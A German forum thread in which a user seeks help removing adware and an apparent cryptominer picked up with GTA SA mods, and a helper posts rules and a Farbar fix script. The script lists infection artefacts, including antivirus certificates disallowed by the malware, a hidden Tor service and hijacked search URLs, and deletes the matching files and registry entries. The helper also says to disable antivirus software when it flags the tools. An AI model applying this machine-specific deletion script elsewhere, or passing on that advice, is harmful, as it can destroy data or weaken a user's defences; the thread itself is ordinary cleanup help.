Vorgeschichte:
Ich habe mir diverse mods für GTA SA heruntergeladen und dazu auch diverse mod installer und IMG editoren. Bei den Dateien die ich mir runtergeladen habe war wohl eine nicht so nette datei dabei, die immerwieder firefox oder internet explorer geöffnet hat und streaming seiten geöffnet hat.Im Taskmanager liefen Tasks, die nicht auf meinem Rechner verloren haben.
Ich bin soweit, dass ich einige Taskts beendet habe und die dazugehörigen Dateien gelöscht habe.Firefox und internet explorer laufen wieder einwandfrei und werden auch nicht einfach so geöffnet
( allerding habe ich 3 bis 4 tasks von firefox im tasksmanager, ebenso bei spotify. ist das normal?)

Momentanes Problem
.Jetzt hab ich nurnoch das Problem, dass mein CPU auf dauerauslastung läuft d.h dauerhaft 100% was nicht normal ist. selbst wenn ich games spiele bzw. gespielt habe wie zb pubg oder arma (welche in der Regel viel leistung brauchen) auf maximal 60-70% und jetzt habe ich eine 100 % auslastung nur auf dem desktop.

Ich bedanke mich schonmal recht herzlich im voraus für die Hilfe.
Ihr könnt euch auch im Teamspeak³ bei mir melden wenn ihr möchtet: monsterclaw.de (geht vermutlich schneller so)
Rechtschreib fehler sind beabsichtigt.

Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen.



Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:

1. Falls wir Hinweise auf illegal erworbene Software finden, werden wir den Support unterbrechen bis jegliche Art von illegaler Software vom Rechner entfernt wurde.
   
   
2. Lies dir meine Anleitungen immer sorgfältig durch, arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste immer alle Logdateien (auch wenn nichts gefunden wurde). Solltest du Probleme haben, stoppe mit deiner Bearbeitung und beschreibe mir dein Problem so gut es geht.
   
   
3. Solltest du mir nicht innerhalb von 3 Tagen antworten, gehe ich davon aus, dass du keine Hilfe mehr benötigst. Dann lösche ich dein Thema aus meinem Abo. Solltest du einmal länger abwesend sein, so gib mir bitte Bescheid!
   
   
4. Während der Bereinigung bitte nichts installieren oder deinstallieren, außer ich bitte dich darum!
   Außerdem bitte ich dich, nicht eigenmächtig irgendwelche Sicherheitsprogramme auszuführen und damit deinen Rechner zu überprüfen/bereinigen, da ich so leicht den Überblick verlieren kann.
   Zudem hättest du dir das Eröffnen eines Themas in diesem Fall auch gleich sparen können, wenn du dann doch wieder alleine rumhantierst.
   
   
5. Bitte beachten: Download bei filepony.de: So ladet Ihr unsere Tools richtig!
   
   
6. Alle zu verwendenen Programme sind auf dem Desktop ( C:\users\dein Benutzername\Desktop\ ) abzuspeichern und von dort als Administrator zu starten!
   
   
7. Einige Programme, die wir hier verwenden, können unter Umständen von deinem Antiviren- oder Anti-Malwareprogramm fälschlicherweise als Bedrohung eingestuft werden. Die Sicherheitsprogramme können aufgrund eines bestimmten Programmverhaltens nicht zwischen "gut" oder "böse" unterscheiden und schlagen Alarm. Dabei handelt es sich um Fehlalarme, welche du getrost ignorieren kannst. Gegebenenfalls musst du deine Sicherheitssoftware vor der Ausführung eines Programms deaktivieren, damit unsere Bereinigungsvorgänge nicht beeinträchtigt werden.
   
   
8. Sollten die Logdateien einmal die zulässige Länge (~ 120.000 Zeichen) überschreiten, so teile die Logdateien auf mehrere Posts auf.
   Zur Not kannst du die Logdateien dann auch zippen (in ein .zip Archiv packen) und als Anhang hochladen.
   
   
9. Bitte arbeite so lange mit mir zusammen, bis ich dir sage, dass wir fertig sind und dein Rechner "sauber" ist. Das vorzeitige Verschwinden von Symptomen heißt nicht automatisch, dass dein Rechner bereits vollständig sauber ist.
   Du musst die hier verwendeten Programme NICHT selbst von deinem Computer entfernen. Das erledigt das TBCleanUpTool am Ende automatisch für dich.
   
   
10. In der Regel antworte ich dir innerhalb von 24 Stunden, oft sogar wesentlich schneller.
    Jedoch habe auch ich einen normalen Beruf und Familie. Ich bin daher nicht jeden Tag stundenlag hier im Forum unterwegs. Es kann unter Umständen bis zu 2 Tage dauern, bis du eine Antwort von mir erhältst. Sollte diese Zeit überschritten sein, so kannst du mir gerne eine PM als Erinnerung schicken.

Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

• Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
• Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
• Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
• Klicke aauf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Danke für deine Mitarbeit!







Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

• Starte jetzt FRST.
• Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
• Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
• Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Bitte poste mit deiner nächsten Antwort

• die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).

Die logs sind zu lange, selbst 1 Log ist zu lange. wie kann ich die posten?

Ich habe mal was gelesen, dass wenn die logs zu lange sind man sie in eine Zip oder rar datei machen soll. da bräuchte ich hilfe, da ich nicht weiß wie ich das mache danke im voraus.

Zitat:

Zitat von moinbro

Ich habe mal was gelesen, dass wenn die logs zu lange sind man sie in eine Zip oder rar datei machen soll. da bräuchte ich hilfe, da ich nicht weiß wie ich das mache danke im voraus.

Rechtsklicke auf die FRST.txt bzw. Addition.txt
Wähle Senden an > Zip komprimierter Ordner

Die Archive kannst du dann als Anhang mit deiner nächsten Antwort hochladen.

Vielen Dank

Was mir noch eingefallen ist in meinen ersten Post zu schreiben, ich habe mich bisschen erkundigt im Internet und im Task manager habe ich auf jeden fall den Xmrig.exe trojaner(?) die symptome sind gleich wie im Internet beschrieben bzw. sie waren gleich, denn ich habe meine pc jetzt ca 2 tage laufen lassen und jetzt ist der Task nichtmehr da. Der CPU läuft jetzt nichtmehr auf 100% sondern auf 75% (was auch zu viel ist für normal zustand). Mein Ram war auf 7.3 ( habe 8Ram (2x 4Ram)) jetzt ist mein Ram auf 4.3, was eigentlich normal ist für meinen Rechner. Ich traue der Sache aber irgendwie nicht, ich habe nichts gemacht und auf einmal ist der Task nichtmehr da. Ich wollte es nur mal erwähnen falls es hilft

Die logs sind im Anhang

Servus,



schlechte Nachrichten... dein Rechner ist voll mit Malware infiziert.

Du bist sogar mit Adware infiziert, von der ich dachte, dass sie "tot" sei... naja, so kann man sich irren...

Daher bist du ab sofort mein Lieblingsuser!

Wir starten gleich mit dem ersten Teil der Bereinigung.





Schritt 1

• Kopiere den gesamten Inhalt der folgenden Code-Box:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  Start::
  CloseProcesses:
  HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
  C:\Program Files (x86)\Common Files\new.bat
  HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
  HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
  HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
  HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
  HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
  HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
  HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
  HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
  HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
  HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
  HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
  HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
  HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
  HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
  HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
  HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
  HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
  HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
  HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
  C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
  C:\Program Files\RDH9TH3UTU
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
  C:\Users\Nico\AppData\Roaming\okdd3kogot1
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
  C:\Program Files (x86)\eu0vb4pykb5
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
  C:\Users\Nico\AppData\Local\pfialx.dll
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
  C:\Program Files\I88TDHYW3R
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
  C:\Windows\rss\csrss.exe
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
  C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
  C:\Users\Nico\AppData\Roaming\EpicNet Inc
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
  ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
  GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
  CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
  HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
  SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
  SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
  SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
  SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
  SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
  FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
  C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
  FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
  FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
  FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
  R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
  C:\ProgramData\Logic Cramble
  R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
  C:\Users\Nico\AppData\Local\XService
  S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
  C:\Program Files\SystemaRev
  R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
  R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
  Unlock: C:\Windows\windefender.exe
  C:\Windows\windefender.exe
  R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
  C:\Windows\qcusolizqbhuglpw.qcus
  S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
  S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
  S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
  C:\ProgramData\PrefsSecure
  S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
  C:\Program Files (x86)\ProxyGate
  R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\csrss
  S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
  C:\ProgramData\Microsoft\Windows\WNetworkMgmt
  S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
  S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
  S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
  S3 VGPU; System32\drivers\rdvgkmd.sys [X]
  R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
  R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
  R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
  C:\Windows\System32\drivers\WinmonProcessMonitor.sys
  C:\Windows\System32\drivers\WinmonFS.sys
  C:\Windows\System32\drivers\Winmon.sys
  2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
  2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
  2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
  2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
  2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
  2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
  2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
  2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
  2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
  2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
  2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
  2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
  2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
  2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
  2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
  2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
  2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
  2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
  2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
  2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
  2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
  2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
  2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
  2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
  2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
  2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
  2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
  2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
  2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
  2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
  2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
  2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
  2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
  2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
